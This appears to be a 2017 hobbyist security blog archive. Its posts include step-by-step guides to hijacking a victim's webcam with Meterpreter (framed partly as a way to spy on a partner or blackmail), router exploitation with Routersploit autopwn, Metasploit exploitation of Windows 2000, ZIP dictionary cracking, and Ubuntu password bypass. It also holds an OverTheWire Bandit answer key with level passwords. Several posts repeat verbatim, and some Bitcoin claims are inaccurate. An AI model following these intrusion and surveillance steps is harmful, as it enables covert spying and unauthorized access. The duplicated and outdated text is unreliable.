Bitcoin
Bitcoin is a latest currency that was created by an anonymous person using the alias Satoshi Nakamoto in 2009. Transactions are made with no central men, it means not using banks. There are no transaction fees and no need to give your actual name. More merchants are beginning to allow them. You can buy webhosting services.
Why use Bitcoins?
Bitcoins can be used to buy goods anonymously. In addition, because of bitcoins are not tied to any country or subject to regulation international payments are easy and cheap. There are no credit card fees so small businesses may like them because. Some people just buy bitcoins as an investment, hoping that they’ll go up in value.
Buying Bitcoins
Buy on an Exchange
Some marketplaces called “bitcoin exchanges” agree to people to buy or sell bitcoins using different currencies. Mt. Gox is the largest bitcoin exchange.
Transfers
People can send bitcoins to each other using mobile apps or their computers. It’s similar to sending cash digitally.
Mining
People try to win to “mine” bitcoins using computers to solve difficult math puzzles. This is how bitcoins are created. Currently, a winner is rewarded with 25 bitcoins roughly every 10 minutes.
How own Bitcoins
Bitcoins are stored in a “digital wallet,” which exists either in the cloud or on a user’s computer. The wallet is a kind of virtual bank account that allows users to send or receive bitcoins, pay for goods or save their money. Unlike bank accounts, bitcoin wallets are not insured by the FDIC.
Secrecy
Though each bitcoin transaction is recorded in a public log, names of buyers and sellers are never revealed – only their wallet IDs. While that keeps bitcoin users’ transactions private, it also lets them buy or sell anything without easily tracing it back to them. That’s why it has become the currency of choice for people online buying drugs or other illicit activities.
Future in question
No one knows what will become of bitcoin. It is mostly unregulated, but that could change. Governments are concerned about taxation and their lack of control over the currency.
Tuesday, October 24, 2017
Monday, October 23, 2017
AES $ DES
Different between DES and AES
DES (Data Encryption Standard) and AES (Advanced Encryption Standard) both are the symmetric block cipher. AES was introduced to overcome the drawback of DES. DES has a smaller key size which makes it less secure to overcome this triple DES was introduced but it turns out to be slower. Hence, later AES was introduced by the National Institute of Standard and Technology. The basic difference between DES and AES is that in DES plaintext block is divided into two halves before the main algorithm starts whereas, in AES the entire block is processed to obtain the ciphertext.
DES (Data Encryption Standard) - This is a symmetric key block cipher that was adopted by National Institute of Standard and Technology in the year 1977. DES is based on the Feistel structure where the plaintext is divided into two halves. DES takes input as 64-bit plain text and 56-bit key to produce 64-bit Ciphertext.
AES (Advanced Encryption Standard) - This is also a symmetric key block cipher. AES was published in 2001 by the National Institute of Standards and Technology. AES was introduced to replace DES as DES uses very small cipher key and the algorithm was quite slower.
DES (Data Encryption Standard) and AES (Advanced Encryption Standard) both are the symmetric block cipher. AES was introduced to overcome the drawback of DES. DES has a smaller key size which makes it less secure to overcome this triple DES was introduced but it turns out to be slower. Hence, later AES was introduced by the National Institute of Standard and Technology. The basic difference between DES and AES is that in DES plaintext block is divided into two halves before the main algorithm starts whereas, in AES the entire block is processed to obtain the ciphertext.
DES (Data Encryption Standard) - This is a symmetric key block cipher that was adopted by National Institute of Standard and Technology in the year 1977. DES is based on the Feistel structure where the plaintext is divided into two halves. DES takes input as 64-bit plain text and 56-bit key to produce 64-bit Ciphertext.
AES (Advanced Encryption Standard) - This is also a symmetric key block cipher. AES was published in 2001 by the National Institute of Standards and Technology. AES was introduced to replace DES as DES uses very small cipher key and the algorithm was quite slower.
- In DES Plaintext is of 64 bits and in AES Plaintext can be of 128,192, or 256 bits.
- DES in comparison to AES has smaller key size. AES has larger key size as compared to DES.
- In DES the data block is divided into two halves. In AES the entire data block is processed as a single matrix.
- DES work on Feistel Cipher structure.AES works on Substitution and Permutation Principle.
- DES has a smaller key which is less secure. AES has large secret key comparatively hence, more secure.
- DES is comparatively slower. AES is faster.
Crack a Password protected ZIP file using KALI LINUX
First take the ZIP file which was protected by a password to the KALI environment.
Then, type following commands..,
in above photo "zipcracker" is the folder which includes the ZIP file which I want to crack and a text file which includes huge number of different words. Actually we are going to do a Dictionary Attack to find the Password.
"crack.zip" is the file which I want to crack. And dictionary.text is the word list..
Now you have the password... :)
Then, type following commands..,
in above photo "zipcracker" is the folder which includes the ZIP file which I want to crack and a text file which includes huge number of different words. Actually we are going to do a Dictionary Attack to find the Password.
"crack.zip" is the file which I want to crack. And dictionary.text is the word list..
Now you have the password... :)
How to mount a Pen Drive to a Virtual Box using commands
- First run the ISO image which you want to install the pen drive, using Virtual Box.
- Then plug the Pen Drive to you Personal Computer.
- In that Window, go to the "Devices" tab then go to the "USB" tab and then select your Pen Drive from the list.
Then, in the Terminal type following commands as it is..
In here, "sdd1" is my pen drives name. It is changing every time you are trying to mount your pen.
then make a directory inside "media" directory call "usbstick"
then type following command..,
*Make sure that your pen format is "FAT32"
Now you pen driver has been mounted.. :)
Monday, October 2, 2017
How To Recover Lost Ubuntu Password
Lets see step by step how to hack Ubuntu password.
Step 1:
Switch the computer on. Go to Grub menu. Generally it
appears automatically, if not then hold down the shift key until the boot menu
appears. In the grub menu, choose for the “recovery mode” option.
It will bring you a black screen with several lines of
output being displayed in a flash. Wait for few seconds here.
Step 2:
Now you will be present with different options of recovery
mode. Here you need to choose “Root Drop into root shell prompt“. Like in the
picture below:
Step 3:
Here, you will be presented with root access (why? Is this
not a security fault?) without prompting any password. Use the following
command to list all the users available:
ls /home
From the previous command choose the “username” for which
you want to reset or (say) hack the password. Now, use the following command to
reset the password for the selected “username“:
passwd username
It prompts for new password. Enter the new password twice:
Enter new UNIX
password:
Retype new UNIX
password:
VoilĂ ! There you go. You have just cracked it and now you
can easily enter into the system.
Possible Troubleshoot:
While entering the new password you might be prompt with
Authentication manipulation error like this:
passwd username
Enter new UNIX
password:
Retype new UNIX
password:
passwd:
Authentication token manipulation error
passwd: password
unchanged
The reason for this error is that file system is mounted
with read access only. Change the access and remount the file system in the
following manner:
mount -rw -o remount
/
Now try to reset the password again. It should work now.
Sunday, October 1, 2017
Hack a web cam using KALI LINUX
this guide will continue to display the abilities of
Metasploit's powerful Meterpreter by hacking into the victim's webcam. This
will allow us to control the webcam remotely, capturing snapshots from it.
Why exactly would you want to hack into somebody's webcam?
Maybe you suspect your significant other of having a fling. Or, maybe you're
into blackmailing. Or, maybe you're just a creep. But the real purpose is to
show just how easy it is, so you're aware that it can be done—and so you can
protect yourself against it.
Unlike just installing a command shell on the victim
computer, the Meterpreter has the power to do numerous and nearly unlimited
things on the target's computer. The key is to get the Meterpreter installed on
their system first.
I've shown how to do this in some of my previous articles,
where you could get the victim to click on a link to our malicious website,
send a malicious Microsoft Office document or Adobe Acrobat file, and more.
So, now let's fire up Metasploit and install Meterpreter on
the victim's system. Once we have done that, we can then begin to view and
capture images from their webcam.
Step 1 -> List the Victim's Webcams
Metasploit's Meterpreter has a built-in module for
controlling the remote system's webcam. The first thing we need to do is to
check if there is a web cam, and if there is, get its name. We can do that by
typing:
meterpreter >
webcam_list
If he/she has a webcam, the system will come back with a
list of all the webcams.
Step 2 -> Snap
Pictures from the Victim's Webcam
Now that we know he/she has a webcam, we can take a snapshot
from the webcam by typing:
meterpreter > webcam_snap
The system will now save a snapshot from her webcam onto our
system in the directory /opt/framework3/msf3, which we can open and see what's
going on.
Image by Daquella manera/Flickr
The quality of the image saved all depends on your victim's
webcam and surroundings.
Step 3 -> Watch
Streaming Video from the Victim's Webcam
Now that we know how to capture a single snapshot from the
victim's webcam, we will now want to run the webcam so that we can watch a
continuous video stream. We can do this by typing;
meterpreter > run webcam -p /var/www
This command starts his/her webcam and sends its streaming
output to /var/www/webcam.htm.
How to Protect
Yourself from Webcam Intrusion
So, what can you do to make sure no one is peeking in on
your habits in front of the computer? The easiest solution—cover your webcam
up. Some laptops with built-in webcams actually have a slide cover you can use.
If that's not the case, a piece of non-translucent tape
should to the trick, unless you want to buy one of these or these things. And
if you still have one of those old-school USB webcams, simply unplug it.
Recover your files using "Autopsy"
Extracting files, and or recovery of critical forensic
information is key within the process of computer forensics. Out in the wild
there are a plethora of tools that a forensic examiner may choose to utilize in
order to do so. Although this does not directly relate to recovery of files
from a forensic stand point, it can also be utilized for users who have lost
data and want to try their hand at recovery of information. The focus of this
document will be around Autopsy and how to use the free tool in order to
recover said files.
Before we start, we need to download a few files. Of course
these files are free and they do enable you to obtain some of the basic bits of
information that you will need in order to obtain files from a forensic image.
Please be aware that we are also mounting the images with other software to
provide to you that the files that were deleted are still on the disk we are
performing our analysis on.
Should you wish to follow the process from start to finish
as we are providing, you may want to download the tools located herein:
PassMark OSFMount, this is utilized to mount the img files we've obtained
within this document: Obtain Disk Image With Linux. And, of course a copy of
either Autopsy and lastly lets not forget ProDiscover. Although for this
example I am using Autopsy, I will also do a write up of the documentation with
the usage of ProDiscover which you can Find Here.
with that said Once you've downloaded your tools, and
Obtaining Disk Image With Linux has been completed, the next stop is to mount
the drives and analyze them. The first thing you should do is load it within
your choice of forensic software. For this example we will be utilizing
Autopsy, other documents will focus on recovering files with ProDiscover.
Loading up Autopsy
The first thing we will do is create a new case. For this
demonstration we will select the following options that are seen below:
Once you select this option fill out some basic information
regarding your "Case" (as it is expected). The following set of
images will guide you through this process.
(Autopsy Start Segment)
Once the introduction segments have been filled out, the
next step we have is to select what information we will be loading. There are a
few things that you should be aware of when you are performing a forensics.
First is if you are doing this from an image (which we are) or other type of
disk. In our case we have selected the "Image File" and then we will
be opening the said image file. Ideally because we are EDT, we will be
selecting that to reflect the timezone of the drive image. Also, because of
time issues with GMT and windows, we will cover this in another paper in time
to come. Below will demonstrate the settings that we've used to load and mount
the disk.
(Selecting a disk image to analyze)
From this point we will then need to select the sources and
information that we will be looking for. Once we've obtained this we can then
start selecting other options and looking into the status of the case, or to
recover files.
(Selecting options and settings to utilize for the forensics)
After this point is reached, you can click on the
"finish button" and let the software load the information that you've
selected. You will notice a progress bar on the bottom right of the screen. Let
this load and when it is finished you can begin to analyze the hard disk.
(The loading bar for the images selected)
Mounting & Viewing Drives
At this point once the information has been loaded, we can
then progress to viewing the application itself and what it has to offer. For
the simplicity of the documents we are also viewing the files outside of the
forensic application first. This has been implemented to give you an ideology
into which files will be there forensically and what appears to only the eye.
Just in case you did not review the information in the beginning of this
document you will need the following program: PassMark OSFMount if you want to
play along with us. Note that this program will also mount the drive as
read-only. You cannot interact with the files outside of opening, and reviewing
their information. Saving, and deleting or even modifying the files is not
possible in this view.
To mount the files, install and start the software. Please
note to run this application you will also need administrative privileges in
order to mount the disk. The following screen shot is an example of how to
mount the image file.
(Default load screen for OSFmount)
From these options, and within this view you will select
"Mount New." Once the mount new has been selected Follow the example
in the image blow.
(Steps to mount an image file)
Once you've selected your image and clicked on
"OK" The drive will show up in your explorer on the left side. You
can see this in the following image below:
(Forensic Image as a Disk)
As we can see from the image above, the disk image has been
mounted as a read-only drive and we can interact with it.
(Combining both views from explorer and Autopsy)
From the above image we see that the images on the left side
of the view are from within Autopsy, while the standard view is from windows
explorer. We can clearly see that there are files missing. What is up with
that? Well, the files that are marked with red x's are actually files that have
been deleted. The deleted files are marked as free-space and are waiting to be
over-written. Within the standard view from windows explorer we see that there
are no files listed with the names to the far left. Why? Again, they've been
deleted. So, things aren't what they appear to be.
Autopsy View
The Autopsy application is split and is not that difficult
in order to follow. The view below demonstrates what the software looks like,
and where you may find the drive that you've attached. Once you've selected the
+ on the drive to expand on the files / folders within it's root, the center window
will display the files, folders and other information that was, or currently is
still on the drive. You must select your drive (top left) that is circled in
red. Once this is selected you can begin to scrutinize the disk and it's
contents.
(Autopsy software and it's main window)
Extracting Deleted Files
Forensic examiners (as well as people looking to retrieve
their deleted files) will normally attempt to recover deleted files from a
forensic archive in order to determine what is within the files they are
recovering. And, also to determine if they are in fact evidence which may help
/ impact a case. In order to recover files within Autopsy, select a file with a
Red-x and then right-click the file. In this case, we will extract the folder
"admenot" and "mainbanner.png"
Considering some of the files may not yield anything other
than displaying that a file was once on that disk, you may also be able to
extract directories that were deleted with their entire contents. Considering
this is a very limited example, it does serve the purpose of how an examiner
would go about to extract deleted information. One thing to point out though is
that not all files will contain the same names! If this is part of a forensic
investigation looking at all values / files / folders with their given and
sometimes cryptic names may yield some information for you.
Secure you Password..!
How to secure your passwords?
Why the “Password” is a must require in a site? Because we have to protect it from unauthorized access. Simply, we should protect our profile or site from outsiders. Some of you know the reason but most of you guys are keeping your passwords safe because you see other people do it or just because of the meaning of the word "password”. Most people don’t know how to protect their passwords. After reading this blog you guys will sure get some idea about it.
There are too many ways to do this but some of them are not that much accurate.
1. Two factor authentication/ Two way authentication
This is the best way to secure passwords. Two factor authentication means instead of using one means of authentication (static/dynamic) user use two means of authentication (static & static/ dynamic & dynamic / static & dynamic ).
What are these static and dynamic means of authentication?
Static - Something that user knows or user possesses. eg:- ID card, Passcode
Dynamic - Something that user does or user is. eg:- Hand movements, Voice recognition, IRIS scanning
Advantage of having Two factor authentication is that even though an attacker knows the password for a particular account he will not get the access to it. In order to get that he has to find out the other factor also. Facebook, Gmail and other social media and services provide Two factor authentication.
2. Combination of lower case, upper case, alpha numerical characters
Passwords are vulnerable to brute force attacks. Therefore if you only use upper case or lower case letters it will be easy for an attacker to break your password.
3. Having a password which contains at least 8 characters
When the password length increases according to that number of combinations also get increase. If the number of combinations are huge process of breaking the password will take huge amount of time. Sometimes it will be not possible for the attacker because the process requires a lot of processing power.
4. Always avoid using solitary words
Solitary means existing alone. That means do not use words that exists in any language.
5. Do not use names of people, places, things, and characters
6. Do not write down passwords
Since people do not like to memorize passwords they tend to write them down on papers. Sometimes they write down credentials on a sticky note and paste it on the monitor at the work place. If that is the case why they have a password to log in? Anyone can use anyone's device or an account.
7. Always log out from devices or accounts once you are done. Otherwise workstation hijacking can occur.
Why the “Password” is a must require in a site? Because we have to protect it from unauthorized access. Simply, we should protect our profile or site from outsiders. Some of you know the reason but most of you guys are keeping your passwords safe because you see other people do it or just because of the meaning of the word "password”. Most people don’t know how to protect their passwords. After reading this blog you guys will sure get some idea about it.
There are too many ways to do this but some of them are not that much accurate.
1. Two factor authentication/ Two way authentication
This is the best way to secure passwords. Two factor authentication means instead of using one means of authentication (static/dynamic) user use two means of authentication (static & static/ dynamic & dynamic / static & dynamic ).
What are these static and dynamic means of authentication?
Static - Something that user knows or user possesses. eg:- ID card, Passcode
Dynamic - Something that user does or user is. eg:- Hand movements, Voice recognition, IRIS scanning
Advantage of having Two factor authentication is that even though an attacker knows the password for a particular account he will not get the access to it. In order to get that he has to find out the other factor also. Facebook, Gmail and other social media and services provide Two factor authentication.
2. Combination of lower case, upper case, alpha numerical characters
Passwords are vulnerable to brute force attacks. Therefore if you only use upper case or lower case letters it will be easy for an attacker to break your password.
3. Having a password which contains at least 8 characters
When the password length increases according to that number of combinations also get increase. If the number of combinations are huge process of breaking the password will take huge amount of time. Sometimes it will be not possible for the attacker because the process requires a lot of processing power.
4. Always avoid using solitary words
Solitary means existing alone. That means do not use words that exists in any language.
5. Do not use names of people, places, things, and characters
6. Do not write down passwords
Since people do not like to memorize passwords they tend to write them down on papers. Sometimes they write down credentials on a sticky note and paste it on the monitor at the work place. If that is the case why they have a password to log in? Anyone can use anyone's device or an account.
7. Always log out from devices or accounts once you are done. Otherwise workstation hijacking can occur.
Thursday, September 14, 2017
How to Hack a Router using "Routersploit"
Hacking a router can be really serious, the attacker can take control over the whole network setup. Even in today some routers are vulnerable for remote authentication. You can easily find and exploit a vulnerability using "Routersploit" on Kali Linux.
Now we'll see how to do a simple exploit on your router..
1) Download the "Routersploit" tool kit. Then set the path.. (Here i downloaded it on my desktop)
2) Then type ./rsf.py
3) Next, give the command "show scanners".
6) Then do the rest as follows..,
Now you can try it.. ;) Thanks..!
Now we'll see how to do a simple exploit on your router..
1) Download the "Routersploit" tool kit. Then set the path.. (Here i downloaded it on my desktop)
2) Then type ./rsf.py
3) Next, give the command "show scanners".
You'll show a huge list of scanners..
4) Use the command "use scanners/autopwn" and then "show options"
Then it will display targeted options as follows..,
5) Then type the command "run". You can see exploitable vulnerabilities from Green Plus (+) button.
6) Then do the rest as follows..,
Now you can try it.. ;) Thanks..!
Tuesday, August 8, 2017
Ransomware
Ransomware.., what is this?
Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid.
Ransomware malware can be spread through malicious e-mail attachments, infected software apps, infected external storage devices and compromised websites. In a lockscreen attack, the malware may change the victim’s login credentials for a computing device; in a data kidnapping attack, the malware may encrypt files on the infected device as well as other connected network devices.
How does it happen?
In most cases, clicking on the wrong link or downloading the wrong file or program, this encrypts your files using a private key that only the attacker possesses. It means attackers will hide a malicious code in the file and distribute it.
After attack happens The victim may receive a pop-up message or email warning that if the ransom is not paid by a certain date, the private key required to unlock the device or decrypt files will be destroyed.
These days ransomware doesn’t just effect desktop machines or laptops, it also targets mobile phones.
Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid.
Ransomware malware can be spread through malicious e-mail attachments, infected software apps, infected external storage devices and compromised websites. In a lockscreen attack, the malware may change the victim’s login credentials for a computing device; in a data kidnapping attack, the malware may encrypt files on the infected device as well as other connected network devices.
How does it happen?
In most cases, clicking on the wrong link or downloading the wrong file or program, this encrypts your files using a private key that only the attacker possesses. It means attackers will hide a malicious code in the file and distribute it.
After attack happens The victim may receive a pop-up message or email warning that if the ransom is not paid by a certain date, the private key required to unlock the device or decrypt files will be destroyed.
These days ransomware doesn’t just effect desktop machines or laptops, it also targets mobile phones.
OverTheWire - "Bandit" Solutions :)
Bandit is a one of famous wargames. It is targeted for the beginners. It will teach the basics needed to be able to play other wargames.
And what is a Wargame?
Wargame (hacking) ... In hacking, a wargame (or war game) is a cyber-security challenge and mind sport in which the competitors must exploit or defend a vulnerability in a system or application, or gain or prevent access to a computer system.
Now let's see how to play this game..,
First you have to setup a platform to play this game. You can use Linux/Unix or Windows platforms.
If you are using Linux/Unix follow these steps first:
And what is a Wargame?
Wargame (hacking) ... In hacking, a wargame (or war game) is a cyber-security challenge and mind sport in which the competitors must exploit or defend a vulnerability in a system or application, or gain or prevent access to a computer system.
Now let's see how to play this game..,
First you have to setup a platform to play this game. You can use Linux/Unix or Windows platforms.
If you are using Linux/Unix follow these steps first:
- Open a Terminal
- type ssh <Level Number>@bandit.labs.overthewire.org -p 2220 and then type <the password you have found> Eg: bandit0@bandit.labs.overthewire.org -p 2220
- Once you found the password for the next level, use 'exit' command to disconnect connection to server.
- Reconnect to the server to go the next level.
If you are using Windows follow these steps:
- Download "Putty" from this link -> https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Make sure to download "putty.exe (the SSH and Telnet client itself)" file.
2. Open Putty and set the Host name and Port
3. Once terminal is opened provide username and password
4. After you found the password for the next level restart the Putty and go the next level
Let's begin the War!!! :)
Level 0
Type Username as 'bandit0' & Password as 'bandit0'
then read the password from the file readme on the home directory. The password in the file is for the bandit1 user which is the user for the next level.
bandit0@melinda:~$ ls -lh
readme
bandit0@melinda:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1 <-- Password for the next level
Level 0 -> 1
Type Username as 'bandit1' & Password as 'boJ9jbbUNNfktd78OOpsqOltutMc3MY1'
They told that the password is in a file called “-“. We need to delimit the dash to read it.
bandit1@melissa:~$ ls
-
bandit1@melissa:~$ cat ./-
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9 <-- Password for the next level
Level 1 -> 2
Type Username as 'bandit2' & Password as 'CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9'
This time we simply need to read a file with spaces in it’s name. Let’s surround the file name in quotes.
bandit2@melissa:~$ ls
spaces in this filename
bandit2@melissa:~$ cat "spaces in this filename"
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK <-- Password for the next level
Level 2 -> 3
Type Username as 'bandit3' & Password as 'UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK'
They told that the file we need is in a hidden file in the inhere directory.
bandit3@melissa:~$ ls
inhere
bandit3@melissa:~$ cd inhere
bandit3@melissa:~/inhere$ ls -la
total 12
drwxr-xr-x 2 root root 4096 2012-05-10 23:51 .
drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit4 bandit3 33 2012-05-10 23:51 .hidden
bandit3@melissa:~/inhere$ cat .hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB <-- Password for the next level
Level 3 -> 4
Type Username as 'bandit4' & Password as 'pIwrPrtPN36QITSp3EQaw936yaFoFgAB'
We are told the password is somewhere in the inhere directory and is the only human readable file in the directory. Let’s see what file types we have.
bandit4@melissa:~$ ls
inhere
bandit4@melissa:~$ cd inhere
bandit4@melissa:~/inhere$ ls -la
total 48
drwxr-xr-x 2 root root 4096 2012-05-10 23:51 .
drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file00
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file01
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file02
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file03
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file04
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file05
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file06
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file07
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file08
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file09
bandit4@melissa:~/inhere$ file ./-*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@melissa:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh <-- Password for the next level
Level 4 -> 5
Type Username as 'bandit5' & Password as 'koReBOKuIDDepwhWk7jZC0RTdopnAYKh'
This is similar to the previous, except we have some more file attributes to look for. As well as more files to look through.
bandit5@melissa:~$ ls
inhere
bandit5@melissa:~$ cd inhere
bandit5@melissa:~/inhere$ ls -la
total 88
drwxr-x--- 22 root bandit5 4096 2012-05-10 23:51 .
drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere00
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere01
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere02
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere03
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere04
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere05
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere06
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere07
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere08
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere09
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere10
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere11
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere12
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere13
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere14
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere15
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere16
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere17
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere18
drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere19
bandit5@melissa:~/inhere$ find ./ -size 1033c
./maybehere07/.file2
bandit5@melissa:~/inhere$ cat ./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7 <-- Password for the next level
Level 5 -> 6
Type Username as 'bandit6' & Password as 'DXjZPULLxYr17uwoI01bNLQbtFemEgo7'
The file can be anywhere on the server, but we are given it’s attributes. This is a job for find. The command attached to the end gets rid of garbage returns and allows viewing of our password file among several others with the same attributes.
bandit6@melissa:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@melissa:~$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs <-- Password for the next level
Tuesday, July 25, 2017
Way to HACK an Operating System using Metasploit
We can gain access to an Operating System, though another operating system. So we can do anything in that machine which we hacked. But there are few conditions which should satisfied.
- Make sure both the Operating Systems are in same IP range.
- There should be a vulnerability in the OS which we are going to exploit.
Now let's see it with a simple example
Here my Vulnerable OS is Windows 2000 (you can try this in all the operating systems).
and I'm going to exploit it with Kali Linux.
To do the process there are some key tools needed. Those are,
- Nmap
- Nessus tool
- Exploit-DB
- Metasploit
Now look in to the process..,
First set up both the Kali and Windows 2000 to same ip ranges. Because we can't ping each other with different ip ranges.
Here is the Kali's IP
and Windows 2000 IP is this..,
then ping each other
use ping <other machine's IP address> command to do that
If it happened successfully you'll display it like this..,
Next, using nmap tool, find open ports in of Windows 2000
use nmap <Windows 2000's IP address> command
Then identify vulnerabilities using Nessus tool. It will display vulnerabilities separately group by the criticality.
those are the vulnerabilities found in Windows 2000.We can't exploit all the vulnerabilities. We should find a exploitable vulnerability next.
then, use the command msfconsole
Next, try to find exploitable vulnerability. to do that first use the command
search <the code of the vulnerability which was found from Nessus>
here i'm trying with MS03-026: Microsoft RPC Interface Buffer Overrun (823980) vulnerability.
then do as following pictures..,
This vulnerability allows us to create a meterpreter session with the server by metasploit. And we can access the windows 2000 shell with root privileges.
Now we are in windows 2000’s root.
Now we can access the windows 2000 from Kali.
As an example we can get System information and Network configurations in Windows, from Kali.
And we can also access the UI of Windows 2000 from kali using a exploitable vulnerability.
Hope you guys understand this post. If it is a doubt feel free to send me a mail.. :)
Subscribe to:
Posts (Atom)